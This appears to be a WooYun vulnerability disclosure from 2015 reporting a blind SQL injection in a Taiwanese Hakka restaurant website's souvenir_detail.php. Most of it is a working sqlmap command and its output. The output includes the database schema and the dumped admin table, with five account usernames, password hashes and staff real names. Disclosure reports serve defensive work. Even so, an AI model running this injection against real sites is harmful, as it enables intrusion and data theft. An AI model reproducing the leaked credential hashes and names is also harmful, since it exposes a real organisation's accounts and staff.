当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156864

漏洞标题:客家八音美食創意館主站存在SQL植入漏洞(管理員密碼泄露)(臺灣地區)

相关厂商:客家八音美食創意館

漏洞作者: 路人甲

提交时间:2015-12-01 11:33

修复时间:2016-01-16 16:10

公开时间:2016-01-16 16:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

「客家八音美食創意館」座落在民風純樸的美濃小鎮,融合40年代和現代的客家風情美食文化創意館,有文物、有美食、也有古早老阿嬤的傳統灶腳回憶。採用客家美濃當地農民所種植的最天然、有機、養生之食材為料理元素,精心調理鑽研出獨特口味,堅持低油、低鹽、不用味精以健康為取向的客家美食。客家八音和客家人生活息息相關,在從前的農業社會中,還參與了客家人每個重要的日子。一般所謂八音是指金、石、絲、竹、匏、土、革、木等八種製作樂器的材料,而客家族群的音樂是因為早期從大陸遷徒來台後,客家人不斷吸收各地民間音樂,再融合自己原有的風格,逐漸演變成一種特殊的曲調,即稱之為「客家八音」。「美濃客家八音」還被列入高雄縣「文化資產保護」之地方傳統藝術文化。「客家八音美食創意館」以原鄉客家美濃在地豐富的人文為基礎,積極為原鄉美濃導入人文藝術,並保存傳統的客家生活和習俗,透過「客家八音美食創意館」的歷史建物與早期農器具的活化再利用,並藉由『美食、紙傘、陶藝』等創意元素與生活融合,展現出「客家傳統八音之精髓」,讓原鄉美濃山城的自然生活價值代代傳承,把原鄉美濃在藝術與人文的薰陶下,再一次在國際觀光舞台上展現風華,發揚客家傳統精緻美食、文化創新的精神。
-- 客家文化料理創新做法,具有客家傳統文化、健康取向、體內環保、養身概念 --
我們研發製作的每項創意精緻美味菜餚,都是創辦人與主廚細心挑選,採用最高級的香料與特製風味醬料,並以照顧在地農民的生計為主,皆取用客家美濃當地農民所種植的最天然、有機、養生之食材為料理元素,精心調理鑽研出獨特口味,堅持低油、低鹽、不用味精以健康為取向的客家料理,延續傳統精髓並融合創新、設計而成。

详细说明:

地址:http://**.**.**.**/souvenir_detail.php?id=1

$ python sqlmap.py -u "http://**.**.**.**/souvenir_detail.php?id=1" -p id --technique=B --random-agent --batch  -D meinung2_1 -T AdminTB -C User_Name,Pass_Word,E_Mail,RealName --dump


Database: meinung2_1
Table: AdminTB
[5 entries]
+-----------+---------------+-------------------------+----------+
| User_Name | Pass_Word     | E_Mail                  | RealName |
+-----------+---------------+-------------------------+----------+
| josh      | josQO0OVocIig | <blank>                 | josh     |
| admin     | adXK684lUFI8c | service@**.**.**.** | 最高管理者    |
| magicnet  | mayr6hwcZWbrQ | service@**.**.**.** | 管理者      |
| meinung   | meheY227XusF. | service@**.**.**.** | 美濃管理者    |
| judy      | jumzMACkp5MPQ | service@**.**.**.** | 瑞琇       |
+-----------+---------------+-------------------------+----------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7158=7158
---
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
current user:    'meinung2_user@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'meinung2_user'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 350     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| CHARACTER_SETS                        | 36      |
| TABLES                                | 36      |
| KEY_COLUMN_USAGE                      | 18      |
| STATISTICS                            | 18      |
| TABLE_CONSTRAINTS                     | 18      |
| SCHEMA_PRIVILEGES                     | 7       |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: meinung2_1
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| Food2TB                               | 33      |
| OrderMealTB                           | 13      |
| Food1TB                               | 10      |
| ProdTB                                | 8       |
| NewsTB                                | 6       |
| ActTB                                 | 5       |
| AdminTB                               | 5       |
| Food1BlockTB                          | 3       |
| Food2BlockTB                          | 3       |
| ContactUsTB                           | 2       |
| FAQTB                                 | 2       |
| CounterTB                             | 1       |
| FloorTB                               | 1       |
| ProdlineTB                            | 1       |
| security_images                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: meinung2_1
Table: MemTB
[1 column]
+-----------+
| Column    |
+-----------+
| pass_word |
+-----------+
Database: meinung2_1
Table: AdminTB
[1 column]
+-----------+
| Column    |
+-----------+
| Pass_Word |
+-----------+
Database: meinung2_1
Table: MemTB
[0 entries]
+-----------+
| pass_word |
+-----------+
+-----------+
Database: meinung2_1
Table: AdminTB
[5 entries]
+---------------+
| Pass_Word     |
+---------------+
| adXK684lUFI8c |
| josQO0OVocIig |
| jumzMACkp5MPQ |
| mayr6hwcZWbrQ |
| meheY227XusF. |
+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7158=7158
---
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] meinung2_1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7158=7158
---
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL 5
Database: meinung2_1
[19 tables]
+-----------------+
| ActTB           |
| AdminTB         |
| ContactUsTB     |
| CounterTB       |
| FAQTB           |
| FloorTB         |
| Food1BlockTB    |
| Food1TB         |
| Food2BlockTB    |
| Food2TB         |
| FreightTB       |
| MemTB           |
| NewsTB          |
| OrderListTB     |
| OrderMealTB     |
| OrderTB         |
| ProdTB          |
| ProdlineTB      |
| security_images |
+-----------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7158=7158
---
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL 5
Database: meinung2_1
Table: AdminTB
[12 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| Authority  | varchar(15)      |
| Con_dition | char(1)          |
| Dep        | tinytext         |
| E_Mail     | varchar(150)     |
| End_Date   | date             |
| ID         | int(10) unsigned |
| Job        | tinytext         |
| Pass_Word  | varchar(13)      |
| RealName   | tinytext         |
| Remark     | text             |
| Start_Date | date             |
| User_Name  | varchar(10)      |
+------------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7158=7158
---
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL 5
Database: meinung2_1
Table: AdminTB
[5 entries]
+-----------+---------------+-------------------------+----------+
| User_Name | Pass_Word     | E_Mail                  | RealName |
+-----------+---------------+-------------------------+----------+
| josh      | josQO0OVocIig | <blank>                 | josh     |
| admin     | adXK684lUFI8c | service@**.**.**.** | 最高管理者    |
| magicnet  | mayr6hwcZWbrQ | service@**.**.**.** | 管理者      |
| meinung   | meheY227XusF. | service@**.**.**.** | 美濃管理者    |
| judy      | jumzMACkp5MPQ | service@**.**.**.** | 瑞琇       |
+-----------+---------------+-------------------------+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-02 16:08

厂商回复:

感謝通報

最新状态:

2016-01-12:HITCON 於接獲通報後除 email 該網站所示之服務信箱外,亦曾致電該網站負責人告知此漏洞,但對方至今仍無回應。